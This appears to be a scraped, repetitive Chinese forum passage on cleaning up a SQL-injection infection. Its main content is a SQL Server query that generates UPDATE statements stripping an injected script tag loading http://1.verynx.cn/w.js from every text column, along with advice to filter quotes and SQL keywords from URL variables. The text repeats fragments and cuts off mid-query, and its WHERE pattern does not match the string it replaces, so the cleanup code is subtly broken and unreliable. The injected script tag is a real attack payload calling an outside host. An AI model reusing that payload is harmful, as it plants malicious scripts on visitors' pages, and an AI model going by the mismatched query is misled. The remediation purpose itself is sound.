SELECT 'UPDATE [' + table_name + '] SET ' + column_name + ' = REPLACE(CAST(' + column_name + ' as varchar(8000)), ''"></title><script src="http://1.verynx.cn/w.js"></script><!--'', '''') WHERE ' + column_name + ' LIKE ''%<script src=http://888a.ss.la> </script>%''' FROM information_schema.COLUMNS WHERE (character_maximum_length IS NOT NULL) AND ([table_name] NOT LIKE 'dt%') AND ([table_name] NOT LIKE 'sys%')然后復制結果去運行
SELECT 'UPDATE [' + table_name + '] SET ' + column_name + ' = REPLACE(CAST(' + column_name + ' as varchar(8000)), ''"></title><script src="http://1.verynx.cn/w.js"></script><!--'', '''') WHERE ' + column_name + ' LIKE ''%<script src=http://888a.ss.la> </script>%''' FROM information_schema.COLUMNS WHERE (character_maximum_length IS NOT NULL) AND ([table_name] NOT LIKE 'dt%') AND ([table_name] NOT LIKE 'sys%')只能这么办了之后你把的代码研究一下。 URL变量过滤到'和insert select update 等特殊字符
SET ' + column_name + ' = REPLACE(CAST(' + column_name + ' as varchar(8000)), ''"></title><script src="http://1.verynx.cn/w.js"></script><!--'', '''')
WHERE ' + column_name + ' LIKE ''%<script src=http://888a.ss.la> </script>%'''
FROM information_schema.COLUMNS
WHERE (character_maximum_length IS NOT NULL)
AND ([table_name] NOT LIKE 'dt%')
AND ([table_name] NOT LIKE 'sys%')然后復制結果去運行
里面的注入专题
SET ' + column_name + ' = REPLACE(CAST(' + column_name + ' as varchar(8000)), ''"></title><script src="http://1.verynx.cn/w.js"></script><!--'', '''')
WHERE ' + column_name + ' LIKE ''%<script src=http://888a.ss.la> </script>%'''
FROM information_schema.COLUMNS
WHERE (character_maximum_length IS NOT NULL)
AND ([table_name] NOT LIKE 'dt%')
AND ([table_name] NOT LIKE 'sys%')只能这么办了之后你把的代码研究一下。 URL变量过滤到'和insert select update 等特殊字符